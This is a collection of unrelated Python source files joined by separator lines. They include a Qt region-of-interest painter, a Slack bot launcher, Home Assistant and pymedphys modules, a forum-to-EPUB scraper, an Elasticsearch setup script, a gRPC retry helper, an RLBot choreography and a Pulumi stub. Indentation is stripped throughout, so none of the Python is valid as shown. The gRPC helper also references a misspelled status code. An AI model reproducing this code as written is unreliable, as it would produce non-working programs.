pixmap to convert to ndarray
alpha_threshold : float
convert pixels with alpha > than this value to 1's and values <= threshold to 0's
Returns
-------
A binary mask of the pixmap as a ndarray
"""
img = pixmap.toImage()
w, h = img.width(), img.height()
ptr = img.constBits()
arr = np.frombuffer(ptr, dtype='uint8').reshape(h, w, 4)
out = (arr[...,3] > alpha_threshold).copy()
return out
def _ndarray_to_arraypixmap(array, color=(0, 255, 0, 128)):
"""Convert a binary array to an ArrayPixmap with specified color and alpha level
Args:
array -- binary ndarray
color -- RGBA color tuple. [0, 255] for each channel
Returns:
An ArrayPixmap with of the ndarray with constant alpha value
and color. The input array is colored with *color* and *alpha*
anywhere it is equal to 1.
"""
assert array.ndim == 2, 'Only 2D arrays are supported'
assert len(color) == 4, 'Color should be a 4-tuple'
h, w = array.shape
array = array.astype('uint32')
array = (color[3] * array) << 24 \
| (color[0] * array) << 16 \
| (color[1] * array) << 8 \
| (color[2] * array)
pixdata = array.flatten()
img = QImage(pixdata, w, h, QImage.Format_ARGB32)
return ArrayPixmap(pixdata, QPixmap.fromImage(img))
def _display_color(color, selected):
alpha = 0.7 if selected else 0.4
color = QColor(color)
color.setAlpha(255 * alpha) # Set alpha to half for display
return color
class ROIDisplayItem(HasTraits):
roi = Instance(ROI)
selected = Bool(False)
slicer = Instance(Slicer)
pixmap = Instance(QPixmap, default=None)
pixmapitem = Instance(QGraphicsPixmapItem, default=None)
def __init__(self, graphics, slicer, **kwargs):
self._graphics = graphics
self.slicer = slicer
super(ROIDisplayItem, self).__init__(**kwargs)
def destroy(self):
self._graphics.scene().removeItem(self.pixmapitem)
@on_trait_change('roi')
def _roi_changed(self, obj, name, old, new):
if old is not None:
self._graphics.scene().removeItem(self.pixmapitem)
self.pixmapitem = None
self.pixmap = None
if new is not None:
self.pixmapitem = QGraphicsPixmapItem()
self._set_pixmap_from_roi(new)
self._graphics.scene().addItem(self.pixmapitem)
@on_trait_change('roi:updated,roi:visible,slicer:slc,selected')
def _roi_updated(self):
self._set_pixmap_from_roi(self.roi)
def _set_pixmap_from_roi(self, roi):
if roi.visible:
color = _display_color(roi.color, self.selected)
else:
color = QColor(Qt.transparent)
self.pixmap = _ndarray_to_arraypixmap(roi.mask[self.slicer.slc.view_slice], color.toTuple())
self.pixmapitem.setPixmap(self.pixmap)
self.pixmapitem.setZValue(_foreground_roi_z if self.selected else _background_roi_z)
class ROIEdit(HasTraits):
roi_tool = WeakRef('_ROITool')
color = Instance(QColor, default=QColor(Qt.black))
def __init__(self, **traits):
self._origin = None
super(ROIEdit, self).__init__(**traits)
self.paintbrush = PaintBrushItem(radius=self.roi_tool.roi_size)
self.paintbrush.setZValue(_paintbrush_z) # Make this item draw on top
self.paintbrush.hide()
self.roi_tool.graphics.scene().addItem(self.paintbrush)
def destroy(self):
self.roi_tool.graphics.scene().removeItem(self.paintbrush)
@on_trait_change('roi_tool:roi_size')
def _roi_size_changed(self):
self.paintbrush.set_radius(self.roi_tool.roi_size)
def _paint(self):
for rdi in self.roi_tool.roi_display_item_dict.itervalues():
if rdi.selected and rdi.roi.visible:
self.paintbrush.fill_pixmap(rdi.pixmap,
QPoint(*self._origin),
QPoint(*self.roi_tool.mouse.coords))
rdi.pixmapitem.setPixmap(rdi.pixmap)
@on_trait_change('roi_tool:roi_manager.selection[]')
def _roi_manager_selection_changed(self):
if not self.roi_tool.mode == 'erase' and len(self.roi_tool.roi_manager.selection) == 1:
color = _display_color(self.roi_tool.roi_manager.selection[0].roi.color, selected=True)
else:
color = QColor(Qt.transparent)
self.paintbrush.set_color(color)
@on_trait_change('roi_tool:mouse:entered')
def mouse_entered(self):
self.paintbrush.show()
@on_trait_change('roi_tool:mouse:left')
def mouse_left(self):
self.paintbrush.hide()
self._origin = None
@on_trait_change('roi_tool:mouse:pressed')
def mouse_pressed(self):
if not self.roi_tool.mouse.buttons.left:
return
if not (self.roi_tool.mode == 'erase' or self.roi_tool.roi_manager.selection):
self.roi_tool.roi_manager.new_roi()
self._origin = self.roi_tool.mouse.coords
self._paint()
@on_trait_change('roi_tool:mouse:moved')
def mouse_moved(self):
coords = self.roi_tool.mouse.coords
self.paintbrush.setPos(QPoint(*coords))
if self._origin:
self._paint()
self._origin = coords
return True
@on_trait_change('roi_tool:mouse:released')
def mouse_released(self):
self._origin = None
for rdi in self.roi_tool.roi_display_item_dict.itervalues():
if rdi.selected and rdi.roi.visible:
mask = _pixmap_to_ndarray(rdi.pixmap)
self.roi_tool.roi_manager.update_mask(rdi.roi, mask)
class _ROITool(GraphicsTool):
name = 'ROI'
roi_size = Int(0)
mode = DelegatesTo('factory')
roi_display_item_dict = Dict(ROI, ROIDisplayItem)
roi_manager = Instance(ROIManager)
def init(self):
self.roi_editor = None
if self.mode in {'draw', 'erase'}:
self.roi_editor = ROIEdit(roi_tool=self)
self.roi_manager = self.factory.roi_manager
self.roi_size = self.factory.factory.roi_size
def destroy(self):
for rdi in self.roi_display_item_dict.values():
rdi.destroy()
if self.roi_editor:
self.roi_editor.destroy()
self.roi_editor = None # Remove reference to ROIEdit, ensures delete
@on_trait_change('factory:factory.roi_size')
def _factory_roi_size_changed(self):
self.roi_size = self.factory.factory.roi_size
@on_trait_change('roi_manager')
def _roi_manager_changed(self):
self._update_roi_display_item_dict(self.roi_manager.rois)
self._update_roi_selection(self.roi_manager.selection)
@on_trait_change('roi_manager:selection[]')
def _roi_selection_changed(self, obj, name, old, new):
for rv in old:
rdi = self.roi_display_item_dict.get(rv.roi)
if rdi:
rdi.selected = False
self._update_roi_selection(new)
@on_trait_change('roi_manager:rois[]')
def _rois_changed(self, obj, name, old, new):
for roi in old:
rdi = self.roi_display_item_dict.pop(roi)
rdi.destroy()
self._update_roi_display_item_dict(new)
def _update_roi_selection(self, roi_views):
for rv in roi_views:
self.roi_display_item_dict[rv.roi].selected = True
def _update_roi_display_item_dict(self, rois):
for roi in rois:
self.roi_display_item_dict[roi] = ROIDisplayItem(self.graphics,
self.roi_manager.slicer,
roi=roi)
class ROITool(GraphicsToolFactory):
klass = _ROITool
roi_manager = Instance(ROIManager)
factory = Instance(object)
mode = Enum('view', 'draw', 'erase')
|
from django.apps import AppConfig
class CryptoserverConfig(AppConfig):
name = 'cryptoserver'
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import re, sys, time, os, subprocess
import pickle as pk
from rtmbot.bin.run_rtmbot import main
from Settings import initSettings
def editConf(Settings):
'Will edit the rtmbot.con'
#Reading lines of rtmbot.conf
with open('rtmbot.conf',"r") as outfile:
conf = outfile.readlines()
#Chaging 3rd line to add current token
conf[2] = " SLACK_TOKEN: \"{}\"\n".format(Settings['SLACK_BOT_TOKEN'])
#Editing rtmbot.conf with SLACK_BOT_TOKEN as SLACK_TOKEN
with open('rtmbot.conf',"w") as outfile:
outfile.writelines(conf)
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
# sys.exit(main())
try:
while True: # super hacky, added this to reboot if connection fails
try: #Will restart after 5 seconds if goes down
#If settings not instantiated
if not os.path.isfile('Settings.txt'):
Settings = initSettings()
#Ediit rtmbot.conf file to add bot token
editConf(Settings)
else:
#Checking if Settings.txt is empty or bad
try:
with open('Settings.txt', 'rb') as f:
Settings = pk.loads(f.read())
except:
cont = input(['\nIt seems like your Settings.txt file is bad. Press 1 if you ' +
'want to create a new Settings.txt file, otherwise press 0 : ' ][0])
if cont == '1':
Settings = initSettings()
editConf(Settings)
else:
print('Aborting.')
quit()
#Running bot
print('\nAntiscam Bot Initiation.')
main()
except Exception as ex:
#Printing error and restart message
print('\nError : ') ; print(ex)
print('\nRESTARTING IN 5 SECONDS.\n')
#Restart after 5 seocnds
time.sleep(5)
except KeyboardInterrupt:
pass
|
from anthill.common.options import options
from anthill.common import server, handler, keyvalue, database, access
from . model.deploy import DeploymentModel
from . model.bundle import BundlesModel
from . model.data import DatasModel
from . model.apps import ApplicationsModel
from . import handler
from . import admin
from . import options as _opts
class DLCServer(server.Server):
def __init__(self):
super(DLCServer, self).__init__()
self.db = database.Database(
host=options.db_host,
database=options.db_name,
user=options.db_username,
password=options.db_password)
self.cache = keyvalue.KeyValueStorage(
host=options.cache_host,
port=options.cache_port,
db=options.cache_db,
max_connections=options.cache_max_connections)
self.data_host_location = options.data_host_location
self.app_versions = ApplicationsModel(self.db)
self.bundles = BundlesModel(self.db)
self.deployment = DeploymentModel(self.bundles, self.app_versions)
self.datas = DatasModel(self.bundles, self.deployment, self.db)
def get_models(self):
return [self.datas, self.bundles, self.deployment, self.app_versions]
def get_admin(self):
return {
"index": admin.RootAdminController,
"app": admin.ApplicationController,
"app_version": admin.ApplicationVersionController,
"data_version": admin.DataVersionController,
"bundle": admin.BundleController,
"new_bundle": admin.NewBundleController,
"attach_bundle": admin.AttachBundleController,
"app_settings": admin.ApplicationSettingsController
}
def get_metadata(self):
return {
"title": "DLC",
"description": "Deliver downloadable content to the user",
"icon": "cloud-download"
}
def get_handlers(self):
return [
(r"/bundle", handler.FetchBundleHandler),
(r"/data/([a-z0-9_-]+)/([a-z0-9_\.-]+)", handler.AppVersionHandler),
]
if __name__ == "__main__":
stt = server.init()
access.AccessToken.init([access.public()])
server.start(DLCServer)
|
"""
homeassistant.components.automation.state
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Offers state listening automation rules.
For more details about this automation rule, please refer to the documentation
at https://home-assistant.io/components/automation/#state-trigger
"""
import logging
from homeassistant.helpers.event import track_state_change
from homeassistant.const import MATCH_ALL
CONF_ENTITY_ID = "entity_id"
CONF_FROM = "from"
CONF_TO = "to"
CONF_STATE = "state"
def trigger(hass, config, action):
""" Listen for state changes based on `config`. """
entity_id = config.get(CONF_ENTITY_ID)
if entity_id is None:
logging.getLogger(__name__).error(
"Missing trigger configuration key %s", CONF_ENTITY_ID)
return False
from_state = config.get(CONF_FROM, MATCH_ALL)
to_state = config.get(CONF_TO) or config.get(CONF_STATE) or MATCH_ALL
if isinstance(from_state, bool) or isinstance(to_state, bool):
logging.getLogger(__name__).error(
'Config error. Surround to/from values with quotes.')
return False
def state_automation_listener(entity, from_s, to_s):
""" Listens for state changes and calls action. """
action()
track_state_change(
hass, entity_id, state_automation_listener, from_state, to_state)
return True
def if_action(hass, config):
""" Wraps action method with state based condition. """
entity_id = config.get(CONF_ENTITY_ID)
state = config.get(CONF_STATE)
if entity_id is None or state is None:
logging.getLogger(__name__).error(
"Missing if-condition configuration key %s or %s", CONF_ENTITY_ID,
CONF_STATE)
return None
state = str(state)
def if_state():
""" Test if condition. """
return hass.states.is_state(entity_id, state)
return if_state
|
# pylint: disable = pointless-statement, pointless-string-statement
# pylint: disable = no-value-for-parameter, expression-not-assigned
# pylint: disable = too-many-lines, redefined-outer-name
import os
import pathlib
from typing import List, Optional
from pymedphys._imports import streamlit as st
from typing_extensions import TypedDict
from pymedphys._monaco import patient as mnc_patient
from pymedphys._streamlit.utilities import exceptions as _exceptions
from . import exceptions, misc
class TelFilePickerResults(TypedDict, total=False):
patient_id: str
patient_name: str
monaco_site: str
monaco_directory: pathlib.Path
selected_monaco_plan: str
tel_paths: List[pathlib.Path]
def monaco_tel_files_picker(
config: dict,
patient_id: str = "",
key_namespace: str = "",
advanced_mode: bool = False,
site: Optional[str] = None,
plan_selection_text: str = "",
) -> TelFilePickerResults:
"""A Streamit widget for selecting a Monaco plan tel file.
Parameters
----------
config : dict
The user's configuration
patient_id : str, optional
A patient ID to default to, by default ""
key_namespace : str, optional
A string to prepend to all Streamlit widget keys, by default ""
advanced_mode : bool, optional
Whether or not to display information and options intended for
advanced users, by default False
site : str, optional
A site to default to, by default None
plan_selection_text : str, optional
Text to display to the user before the plan selection radio
button, by default ""
Returns
-------
results : TelFilePickerResults (dict)
"""
(
monaco_site,
monaco_directory,
patient_id,
plan_directory,
patient_directory,
) = monaco_patient_directory_picker(
config, patient_id, key_namespace, advanced_mode, site
)
patient_name = read_monaco_patient_name(str(patient_directory))
st.write(f"Patient Name: `{patient_name}`")
all_tel_paths = list(plan_directory.glob("**/*tel.1"))
all_tel_paths = sorted(all_tel_paths, key=os.path.getmtime, reverse=True)
plan_names_to_choose_from = [
str(path.relative_to(plan_directory)) for path in all_tel_paths
]
if len(plan_names_to_choose_from) == 0:
if patient_id != "":
st.write(
_exceptions.NoRecordsFound(
f"No Monaco plans found for patient ID {patient_id}"
)
)
return {"patient_id": patient_id}
if plan_selection_text != "":
st.write(plan_selection_text)
selected_monaco_plan = st.radio(
"Select a Monaco plan",
plan_names_to_choose_from,
key=f"{key_namespace}_monaco_plans",
)
tel_paths = []
if selected_monaco_plan is not None:
current_plans = list(
monaco_directory.glob(f"*~{patient_id}/plan/{selected_monaco_plan}")
)
current_plans = [path.resolve() for path in current_plans]
if len(current_plans) != 1:
st.write("Plans found:", current_plans)
raise ValueError("Exactly one plan should have been found")
tel_paths += current_plans
return {
"monaco_site": monaco_site,
"monaco_directory": monaco_directory.resolve(),
"patient_id": patient_id,
"patient_name": patient_name,
"selected_monaco_plan": selected_monaco_plan,
"tel_paths": tel_paths,
}
def monaco_patient_directory_picker(
config, patient_id="", key_namespace="", advanced_mode=False, site=None
):
monaco_site, monaco_directory = misc.get_site_and_directory(
config,
"Monaco Plan Location",
"monaco",
default=site,
key=f"{key_namespace}_monaco_site",
)
if advanced_mode:
st.write(monaco_directory.resolve())
patient_id = st.text_input(
"Patient ID", patient_id, key=f"{key_namespace}_patient_id"
)
if advanced_mode:
patient_id
if patient_id == "":
st.stop()
plan_directories = list(monaco_directory.glob(f"*~{patient_id}/plan"))
if len(plan_directories) == 0:
if patient_id != "":
st.write(
exceptions.NoRecordsFound(
f"No Monaco plan directories found for patient ID {patient_id}"
)
)
st.stop()
return {"patient_id": patient_id}
elif len(plan_directories) > 1:
raise ValueError(
"More than one patient plan directory found for this ID, "
"please only have one directory per patient. "
"Directories found were "
f"{', '.join([str(path.resolve()) for path in plan_directories])}"
)
plan_directory = plan_directories[0]
patient_directory = pathlib.Path(plan_directory).parent
return monaco_site, monaco_directory, patient_id, plan_directory, patient_directory
@st.cache
def read_monaco_patient_name(monaco_patient_directory):
return mnc_patient.read_patient_name(monaco_patient_directory)
|
#!/usr/bin/python37
# -*- coding : utf-8 -*-
import os
import sys
from urllib.parse import urlparse
import re
from bs4 import BeautifulSoup
import requests
import html2epub
DIR = "C:\\Users\\baoju\\Desktop\\" # 输出epub文件的路径
html_template = """
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
</head>
<body>
{content}
</body>
</html>
"""
def getbook(url): # 获取整本书并写入文本
try:
r = requests.request('GET', url)
except:
print("分析失败了, 稍后再试吧")
sys.exit()
domain = '{uri.scheme}://{uri.netloc}'.format(
uri=urlparse(url))
soup = BeautifulSoup(r.text, 'html.parser')
name = soup.title.string
bookName = re.sub(r'[\/:*?"<>|]', '-', name)
tags = soup.find_all('td', class_='t_f')
htmls = []
for eachTag in tags:
html = str(eachTag)
html = html.replace("file", "src")
html = html.replace("td", "div")
# html中的img标签的src相对路径的改成绝对路径
pattern = "(<img .*?src=\")(.*?)(\")"
def func(m):
if not m.group(2).startswith("http"):
rtn = "".join(
[m.group(1), domain, m.group(2), m.group(3)])
return rtn
else:
return "".join([m.group(1), m.group(2), m.group(3)])
html = re.compile(pattern).sub(func, html)
html = html_template.format(content=html)
htmls.append(html)
print("下载完毕, 准备整合epub")
return bookName, htmls
def saveEpub(url):
bookName, htmls = getbook(url)
epub = html2epub.Epub(bookName)
i = 0
print("开始整合epub...")
for eachHtml in htmls:
i += 1
chapter = html2epub.create_chapter_from_string(
eachHtml, title="章节" + str(i))
epub.add_chapter(chapter)
print("已整合{:.2f}%".format(
(htmls.index(eachHtml) + 1) / len(htmls) * 100))
epub.create_epub(DIR)
print("整合完毕.")
if __name__ == "__main__": # 主函数
# URL = input("请输入要下载的网址: ") # 获取地址
# print("url为: " + URL + "\n开始下载...")
URL = "https://www.lightnovel.cn/forum.php?mod=viewthread&tid=989498&page=1&authorid=1078151"
saveEpub(URL)
|
from django.conf import settings
def mediawiki_site_settings(request):
return {
'MEDIAWIKI_API_ENDPOINT': settings.MEDIAWIKI_API_ENDPOINT,
'MEDIAWIKI_BASE_URL': settings.MEDIAWIKI_BASE_URL,
'MEDIAWIKI_INDEX_ENDPOINT': settings.MEDIAWIKI_INDEX_ENDPOINT,
'PROPERTY_BASE_URL': settings.PROPERTY_BASE_URL,
'USER_BASE_URL': settings.USER_BASE_URL,
'USER_TALK_BASE_URL': settings.USER_TALK_BASE_URL,
'CONTRIBUTIONS_BASE_URL': settings.CONTRIBUTIONS_BASE_URL,
'WIKI_CODENAME': settings.WIKI_CODENAME,
'USER_DOCS_HOMEPAGE': settings.USER_DOCS_HOMEPAGE,
'MEDIAWIKI_NAME': settings.MEDIAWIKI_NAME,
'DISCUSS_PAGE_PREFIX': settings.DISCUSS_PAGE_PREFIX,
'DISCUSS_PAGE_PRELOAD': settings.DISCUSS_PAGE_PRELOAD,
'REVERT_PAGE': settings.REVERT_PAGE,
'REVERT_PRELOAD': settings.REVERT_PRELOAD,
'WIKILINK_BATCH_PREFIX': settings.WIKILINK_BATCH_PREFIX
}
|
import os
import re
import json
from cfg import *
class Preprocesser:
def __init__(self, origin_path, target_path, label_path):
self.origin_path = origin_path
self.target_path = target_path
self.label_path = label_path
def merge(self):
print('get original file list...')
origin_list = os.listdir(self.origin_path)
with open(self.label_path, 'w', encoding='utf-8') as f_label:
json.dump(origin_list, f_label, ensure_ascii=False)
print('merge original file list...')
id = 0
with open(self.target_path, 'w', encoding='utf-8') as f_write:
for file_idx, filename in enumerate(origin_list):
with open(os.path.join(self.origin_path, filename), 'r', encoding='utf-8') as f:
for line in f.readlines():
doc_list = line.strip().split('|||')
try:
index, title, date, url, text = doc_list
except:
print(f"[error] line {doc_list} is not in a correct format")
continue
if not index.isdigit():
continue
if not re.search('\d+-\d+-\d+', date):
continue
new_doc_line = f'{str(file_idx).zfill(3)}|||{str(id).zfill(5)}|||{title}|||{date}|||{url}|||{text}\n'
f_write.write(new_doc_line)
id += 1
print(f'finish writing {filename}')
print(f'write {id} documents')
if __name__ == '__main__':
preprocesser = Preprocesser(origin_path=ORIGIN_PATH, target_path=TARGET_PATH, label_path=LABEL_PATH)
preprocesser.merge()
|
import elasticsearch
import boto3
from elasticsearch import Elasticsearch, RequestsHttpConnection
from requests_aws4auth import AWS4Auth
INDEX = "toyo_items"
host = 'search-nakamura196-rgvfh3jsqpal3gntof6o7f3ch4.us-east-1.es.amazonaws.com'
profile_name = "default"
region = "us-east-1"
if profile_name == None:
es = Elasticsearch([host])
else:
session = boto3.Session(profile_name=profile_name)
credentials = session.get_credentials()
awsauth = AWS4Auth(credentials.access_key, credentials.secret_key,
region, 'es', session_token=credentials.token)
es = Elasticsearch(
hosts=[{'host': host, 'port': 443}],
http_auth=awsauth,
use_ssl=True,
verify_certs=True,
connection_class=RequestsHttpConnection
)
es = Elasticsearch(
hosts=[{'host': host, 'port': 443}],
http_auth=awsauth,
use_ssl=True,
verify_certs=True,
connection_class=RequestsHttpConnection
)
mapping = {
"mappings": {
"dynamic_templates": [
{
"my_dynamic_ja_analyzer_conf": {
"match_mapping_type": "*",
"match": "*_ja",
"mapping": {
"analyzer": "my_ja_analyzer_conf",
"fields": {
"keyword": {
"type": "keyword",
"ignore_above": 256
}
}
}
}
},
{
"my_dynamic_title_analyzer_conf": {
"match_mapping_type": "*",
"match": "_title",
"mapping": {
"analyzer": "my_ja_analyzer_conf",
"fields": {
"keyword": {
"type": "keyword",
"ignore_above": 256
}
}
}
}
}
]
},
"settings": {
"analysis": {
"analyzer": {
"my_ja_analyzer_conf": {
"type": "custom",
"tokenizer": "kuromoji_tokenizer",
"mode": "search",
"char_filter": [
"icu_normalizer",
"kuromoji_iteration_mark"
],
"filter": [
"kuromoji_baseform",
"kuromoji_part_of_speech",
"ja_stop",
"lowercase",
"kuromoji_number",
"kuromoji_stemmer",
"asciifolding"
]
}
}
}
}
}
if es.indices.exists(index=INDEX):
es.indices.delete(INDEX)
es.indices.create(index=INDEX, body=mapping) |
# -*- coding:utf-8 -*-
from __future__ import absolute_import, unicode_literals, print_function
import time
import logging
from decouple import config
from grpc import StatusCode
from grpc._channel import _Rendezvous, _UnaryUnaryMultiCallable
logger = logging.getLogger(__name__)
# The maximum number of retries
_MAX_RETRIES_BY_CODE = {
# Internal errors. This means that some invariants expected by the
# underlying system have been broken. This error code is reserved for
# serious errors
StatusCode.INTERNAL: config('GRPC_RETRY_INTERNAL', default=1, cast=int),
# The operation was aborted, typically due to a concurrency issue such as a
# sequencer check failure or transaction abort. See the guidelines above for
# deciding between FAILED_PRECONDITION, ABORTED, and UNAVAILABLE.
StatusCode.ABORTED: config('GRPC_RETRY_ABPRTED', default=3, cast=int),
# The service is currently unavailble. this is most likely a transient
# condition, which can be corrected by retrying with a backoff. Not that it
# is not always safe to retry non-idempotent operations.
StatusCode.UNAVAILABLE: config('GRPC_RETRY_UNAVAILABLE', default=5,
cast=int),
# The deadline expired before the operation could complete. For operations
# that change the state of the system, this error may be returned even if
# the operation has completed successfully. For example, a successful
# response from a server could have been delayed long.
StatusCode.DEADLINE_EXCEEDED: config('GRPC_RETRY_DEADLINE_EXCEEDED',
default=5, cast=int),
}
# The minimum seconds (float) of sleeping
_MIN_SLEEPING = config('GRPC_RETRY_MIN_SLEEPING', default=0.015625, cast=float)
_MAX_SLEEPING = config('GRPC_RETRY_MAX_SLEEPING', default=1.0, cast=float)
class RetriesExceeded(Exception):
"""docstring for RetriesExceeded"""
pass
def retry(f, transactional=False):
def wraps(*args, **kwargs):
retries = 0
while True:
try:
return f(*args, **kwargs)
#except _Rendezvous as e:
except Exception as e:
code = e.code()
max_retries = _MAX_RETRIES_BY_CODE.get(code)
if max_retries is None or transactional and code == StatusCode.ABABORTED:
raise
if retries > max_retries:
raise RetriesExceeded(e)
backoff = min(_MIN_SLEEPING * 2 ** retries, _MAX_SLEEPING)
logger.error("sleeping %r for %r before retrying failed request...", backoff, code)
retries += 1
time.sleep(backoff)
return wraps
def retrying_stub_methods(obj):
for key, attr in obj.__dict__.items():
if isinstance(attr, _UnaryUnaryMultiCallable):
setattr(obj, key, retry(attr))
|
from math import pi
from typing import List
from rlbot.utils.rendering.rendering_manager import RenderingManager
from rlbot.utils.structures.game_data_struct import GameTickPacket
from rlutilities.linear_algebra import vec3, dot, look_at, axis_to_rotation, cross
from rlutilities.simulation import Ball, Input, Curve
from choreography.choreography_main import Choreography
from choreography.drone import Drone
from choreography.group_step import BlindBehaviorStep, StateSettingStep, ParallelStep, DroneListStep
from choreography.paths.dragon_paths import BLUE_DRAGON_PATH, PURPLE_DRAGON_PATH
from choreography.utils.vector_math import direction
TOTAL_SPEED = 0.7
class RingsSetup(StateSettingStep):
target_indexes = range(10, 40)
def set_ball_state(self, ball: Ball):
ball.position = vec3(0, 0, -500)
ball.velocity = vec3(0, 0, 0)
ball.angular_velocity = vec3(0, 0, 0)
def set_drone_states(self, drones: List[Drone]):
for i, drone in enumerate(drones):
shifted_index = i - 15
sign = 1 if shifted_index >= 0 else -1
if sign > 0:
shifted_index = 15 - shifted_index
drone.position = vec3(shifted_index * 200 + sign * 800, -600 * sign, 20)
drone.velocity = vec3(0, 0, 0)
drone.angular_velocity = vec3(0, 0, 0)
drone.orientation = look_at(vec3(0, 1, 0) * sign, vec3(0, 0, 1))
class HideDragons(StateSettingStep):
target_indexes = range(0, 10)
def set_drone_states(self, drones: List[Drone]):
for i, drone in enumerate(drones):
drone.position = vec3(i * 100, 6000, 0)
class Dragon(StateSettingStep):
duration = 65.0 / TOTAL_SPEED
distance_between_body_parts = 300
path: Curve = None
RENDER_PATH = False
def set_drone_states(self, drones: List[Drone]):
# get the length of the path from start to the dragons's head (first bot)
head_t = self.time_since_start / self.duration * self.path.length
for drone in drones:
# offset the other body parts
drone_t = head_t - self.distance_between_body_parts * (drone.id - drones[0].id)
# if we're not on the path yet, don't do any state setting
if drone_t < 0:
continue
t = self.path.length - drone_t # because Curve.point_at's argument means distance to end
pos = self.path.point_at(t)
pos_ahead = self.path.point_at(t - 500)
pos_behind = self.path.point_at(t + 300)
# figure out the orientation of the body part
facing_direction = direction(pos_behind, pos)
target_left = cross(facing_direction, direction(pos, pos_ahead))
target_up = cross(target_left, facing_direction)
up = drone.up() + target_up * 0.9 + vec3(0, 0, 0.1)
target_orientation = look_at(facing_direction, up)
drone.position = pos_behind
drone.velocity = facing_direction * (self.path.length / self.duration)
drone.angular_velocity = vec3(0, 0, 0) # TODO: setting correct angular velocity could help with replays
drone.orientation = target_orientation
def render(self, renderer: RenderingManager):
if self.RENDER_PATH:
renderer.draw_polyline_3d(self.path.points[::5], renderer.white())
class BlueDragon(Dragon):
path = Curve(BLUE_DRAGON_PATH.to_points(2000))
target_indexes = range(0, 5)
class PurpleDragon(Dragon):
path = Curve(PURPLE_DRAGON_PATH.to_points(2000))
target_indexes = range(5, 10)
class RingOfFire(DroneListStep):
ring_radius = 500
orbit_radius = 2200
orbit_center = vec3(0, 0, 1400)
starting_orbit_rotation: float = None
orbit_start_delay = 20 / TOTAL_SPEED
orbit_speed = 0.45 * TOTAL_SPEED
def step(self, packet: GameTickPacket, drones: List[Drone]):
orbit_t = max(0, self.time_since_start - self.orbit_start_delay)
orbit_rotation = self.starting_orbit_rotation + orbit_t * self.orbit_speed
direction_from_center = dot(axis_to_rotation(vec3(0, 0, 1) * orbit_rotation), vec3(1, 0, 0))
ring_center = self.orbit_center + direction_from_center * self.orbit_radius
ring_facing_direction = cross(direction_from_center, vec3(0, 0, 1))
for drone in drones:
i = drone.id - drones[0].id
angle = i / len(drones) * pi * 2
pos = ring_center + dot(vec3(0, 0, 1), axis_to_rotation(ring_facing_direction * angle)) * self.ring_radius
if pos[2] > self.orbit_center[2] + self.ring_radius - self.time_since_start * 200:
drone.hover.target = pos
drone.hover.up = ring_facing_direction
drone.hover.step(self.dt)
drone.controls = drone.hover.controls
drone.controls.jump = True
class Ring1(RingOfFire):
target_indexes = range(10, 25)
starting_orbit_rotation = pi
class Ring2(RingOfFire):
target_indexes = range(25, 40)
starting_orbit_rotation = 0
class DragonBoost(BlindBehaviorStep):
target_indexes = range(0, 10)
def set_controls(self, controls: Input):
controls.boost = True
class Wait(BlindBehaviorStep):
duration = 5.0
def set_controls(self, controls: Input):
pass
class DragonsChoreography(Choreography):
map_name = "Mannfield_Night"
@staticmethod
def get_appearances(num_bots: int) -> List[str]:
return ['blue_dragon.cfg'] * 5 + ['purple_dragon.cfg'] * 5 + ['fire.cfg'] * 30
@staticmethod
def get_teams(num_bots: int) -> List[int]:
return [0] * 10 + [1] * 30
@staticmethod
def get_num_bots():
return 40
def generate_sequence(self):
self.sequence = [
Wait(),
HideDragons(),
RingsSetup(),
ParallelStep([
BlueDragon(),
PurpleDragon(),
DragonBoost(),
Ring1(),
Ring2()
]),
]
|
array= [0,0,0,0,0,0]
for i in range(len(array)):
array[i] = len(array)-i
|
import logging
import pytest
from pygate_grpc.client import PowerGateClient
from pygate_grpc.types import User
logger = logging.getLogger(__name__)
@pytest.fixture(scope="module")
def user(pygate_client: PowerGateClient):
return pygate_client.admin.users.create()
@pytest.fixture(scope="module")
def staged_file(pygate_client: PowerGateClient, user: User):
original_file_contents = b"Another file for staging and testing"
staged_file = pygate_client.data.stage_bytes(
original_file_contents, token=user.token
)
pygate_client.config.apply(staged_file.cid, token=user.token, override=True)
return staged_file
def test_storage_deals(pygate_client: PowerGateClient, user: User):
records = pygate_client.deals.storage_deal_records(
include_pending=True, include_final=True, token=user.token
)
assert type(records) == list
def test_retrieval_deals(pygate_client: PowerGateClient, user: User):
records = pygate_client.deals.retrieval_deal_records(
include_pending=True, include_final=True, token=user.token
)
assert type(records) == list
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import json
import warnings
import pulumi
import pulumi.runtime
from typing import Union
from .. import utilities, tables
class VaultLock(pulumi.CustomResource):
complete_lock: pulumi.Output[bool]
"""
Boolean whether to permanently apply this Glacier Lock Policy. Once completed, this cannot be undone. If set to `false`, the Glacier Lock Policy remains in a testing mode for 24 hours. After that time, the Glacier Lock Policy is automatically removed by Glacier and the this provider resource will show as needing recreation. Changing this from `false` to `true` will show as resource recreation, which is expected. Changing this from `true` to `false` is not possible unless the Glacier Vault is recreated at the same time.
"""
ignore_deletion_error: pulumi.Output[bool]
"""
Allow this provider to ignore the error returned when attempting to delete the Glacier Lock Policy. This can be used to delete or recreate the Glacier Vault via this provider, for example, if the Glacier Vault Lock policy permits that action. This should only be used in conjunction with `complete_lock` being set to `true`.
"""
policy: pulumi.Output[str]
"""
JSON string containing the IAM policy to apply as the Glacier Vault Lock policy.
"""
vault_name: pulumi.Output[str]
"""
The name of the Glacier Vault.
"""
def __init__(__self__, resource_name, opts=None, complete_lock=None, ignore_deletion_error=None, policy=None, vault_name=None, __props__=None, __name__=None, __opts__=None):
"""
Manages a Glacier Vault Lock. You can refer to the [Glacier Developer Guide](https://docs.aws.amazon.com/amazonglacier/latest/dev/vault-lock.html) for a full explanation of the Glacier Vault Lock functionality.
> **NOTE:** This resource allows you to test Glacier Vault Lock policies by setting the `complete_lock` argument to `false`. When testing policies in this manner, the Glacier Vault Lock automatically expires after 24 hours and this provider will show this resource as needing recreation after that time. To permanently apply the policy, set the `complete_lock` argument to `true`. When changing `complete_lock` to `true`, it is expected the resource will show as recreating.
